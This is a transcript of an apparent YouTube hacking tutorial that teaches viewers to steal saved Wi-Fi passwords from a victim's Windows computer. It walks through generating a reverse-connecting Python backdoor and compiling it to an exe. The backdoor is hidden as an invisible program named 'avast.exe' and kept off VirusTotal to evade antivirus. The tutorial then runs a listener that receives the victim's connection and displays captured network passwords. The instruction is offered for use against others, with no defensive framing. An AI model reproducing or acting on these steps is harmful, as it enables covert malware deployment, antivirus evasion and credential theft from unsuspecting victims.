my YouTube channel. So today I'm going to teach you how to steal Wi-Fi passwords from a computer. In order to do that, you will need a tool called CyberCrack. I call it CyberCrack myself, and in order to download that, just go to the Git repository CyberCrack, and I will include the link in the description below. Click on this code button. Copy this link. You must have Git installed. If you don't have Git installed, just click on download zip, extract it, and you will get the same result. So go to the command prompt or your Linux terminal. Just type git clone this, and if I click enter, I will get a fatal error because I already installed this tool. So it won't give a give a fatal error to you because you are installing it for the first time. So if you hit enter, fatal, destination file CyberCrack already exists. That's because I installed this tool. So if you want to use this tool, you must install the requirements. To do that, just type pip install r requirements txt. You must have Python installed because you can see this is purely written in Python. This CyberCrack is purely written in Python. So you can see cybercrack.py, everything. Py is a Python extension. You can see languages Python, pure Python. So you must have Python installed. Just type pip install -r requirements.txt, and if you hit enter, and it will install those things to you. And it's done. Then clear the screen, and then type python cybercrack.py. So this will take some time. So you can just go to another command prompt window, and just we can start payload. So just go to the path that we installed CyberCrack. So just type python cybervenom.py -h. So these are the available options. H equals for help, so this help message and exit. P equals for payload, and you must give this tool the name of the payload. Lhost means your IP. To get your IP, just type ipconfig, but if you are in a Linux machine, type ifconfig, ipconfig, ifconfig. So L port, specify any port you want. F equals to file, the name of the file that you want to generate, and the current gives the currently available payloads. So to do that, just type --current payloads, and this is the payload that we are going to be we will be using. Malware Wi-Fi password. So copy that name. Now we are going to generate the payload. So just type python cybervenom.py -p, the name of the payload, --l port, specify any port you like, --l host, the IP address. In my case it is 192.168.1.6, and the F, which is the file name. I'm going to name it Wi-Fi payload, or I'm going to name it payload.py. Not payload. Okay, I'm going to name it Wi-Fi payload.py. So I think there might be, yes. So I have a file called payload. So that's a backdoor I generated earlier, so I'm going to delete it. So all good. Now we will generate it. Notice your file extension would be a py file, which is a Python file. If you specify any file extension, it won't work, any file extension except Python. Python cybervenom pyp malware wi-fi password --l port, the port you want, l host your IP address, a file name wi-fi payload.py. If you hit enter, sorry about that, if you hit enter, so this is a banner, VirusTotal banner. You must never upload these backdoors to virustotal.com. If you do, you won't be able to use these backdoors again, because VirusTotal shares this information regarding these backdoors with antivirus softwares. So you promise me you won't upload these backdoors to virustotal.com. So just type y and you say finish writing the file. So go to here you can see wi-fi payload.py. So we must convert this Wi-Fi payload into exe file. So in order to do that, we are going to use a Python module called PyInstaller. In order to use it, you must install it. To do it, just type pip install PyInstaller, and if you hit enter, I already installed the tool, so it will say requirement already satisfied. It will take some time. You can see requirement already satisfied. So while this installs, we are going to we are going to take a look at CyberCrack. So this is CyberCrack py. So in order to start this, just type Python CyberCrack py and hit enter. If you are on a Linux machine, Kali Linux, you must type sudo to give this script admin rights. So it will take some time. So okay, now it's installed. Clear the screen. Just type PyInstaller, the name of the file, which is wi-fi payload.py. So it will be a little file folder will be created called dist. In it there will be nothing. So I created a bunch of payloads before this video, so there will be there won't be any file in this dist for folder. So what you want to do is PyInstaller dash one file dash hidden import. So I'm just going to copy this line, hidden import socket, and again hidden import sub process, and then installer one file hidden import socket subprocess wi-fi payload.py. It's going to compile this into a exe. So if you hit enter, so it will take some time. CyberCrack framework must be loaded by now. So here's the CyberCrack framework. So in order to use the tools, you must load the tools. To do that, just type load all, and then just type show payloads. There are 3 payloads available. This is the payload that we are going to use. So copy that name. It's called malware Wi-Fi password. So I'm going to just type set payload malware Wi-Fi password. So if you hit enter, you can see CyberCrack Wi-Fi password. So type help to show the options. This is the option. So L host your IP address. So in my case it's 192.168.1.6. L port, the port you put to your backdoor. The port need to the backdoor. The port is needed to the backdoor to connect back to your machine. So I use L port 2008 in the CyberVenom. You can see it. I use that in the CyberVenom. So you must use the port you specified in the CyberVenom backdoor creation. So if you hit enter, now all the options are set. You just need to click run, type run or exploit. So you can see listing for incoming connections. So now the backdoor must be generated by now. Yes, it's generated. So if you go to the dist folder, you can see exe called Wi-Fi payload. But if you double click this file, it will give you a connection, but a window will open. So this will be a little suspicious. If the user closes the window, the connection will be lost. So to prevent that, what we'll do is we'll hide this console window. So in order to do that, what we are going to do is we are going to create a batch file, a Windows batch file. Go to your command prompt and just then go to the dist directory and then just type sorry about that, type the name of the batch file. I'm going to just name it avast. Sorry about that. Type null into the name you want. I'm going to name it avast.bat or avast.cmd. So if you go back here, you can see a batch file called avast. So you can open this with any text editor. I'm going to open with Notepad++. Now what we are going to do is copy the name of this Wi-Fi exe file. So I named it Wi-Fi payload.exe and type this little line in your batch script and save it. And you will convert this into a exe. To do that, I already installed a tool called bat2exe converter. So to convert it, you just need to click on these three dots and then navigate to the dist folder. I'm already in it. Open this avast file and then just change these options. Now under the visibility, this will be set to an visible application. Change it to an invisible application. Temporarily files will be set to delete on exit. Change it to do not delete. Miscellaneous, change it to overwrite existing files. And architecture, if your victim is 32-bit, change to 32-bit. If your victim is 64-bit, change it to 64-bit. And then click on compile. And it's done. You can see a avast.exe file. You can simply delete this batch file. And if you double click this file, it won't open a console window, but it will give us a connection. So it's no connection. So I'm going to double click the file, avast, not the Wi-Fi payload. I will open this. Open. So nothing will happen, but I will get a connection here. See, one cyber session open, victim connected, please wait 3 seconds. And I have access to every Wi-Fi network the victim has been connected. So the main network is SLD fiber. I am not going to give that password to you. I am going to use this dialog M50E1A. It's a old one. So just you can see these all user profiles. Yeah, these are the names. So if copy the name of any profile you want to get the password, copy it and then paste it in this little input box called the profile you want the password. And if you hit enter, and you can see the password and a bunch of few info. Here's the password. Under the key content you can find the password. This is the password. So I'm going to show in other examples. If you want to get these profiles again, just type show options. Sorry, it must be options or something. I'll just type help. I think there might be a bug, so don't worry about it. You can scroll to the top and copy this name called Android 6. I'm going to get that password also. Just paste it and then if you hit enter, and this is the password MLEU3889 under the key content. So this is it for this video. I hope you enjoyed it. If you did, make sure to like and subscribe my channel and hit that bell icon if you want more hacking tutorials. And I will see you in my next video. Goodbye and happy hacking.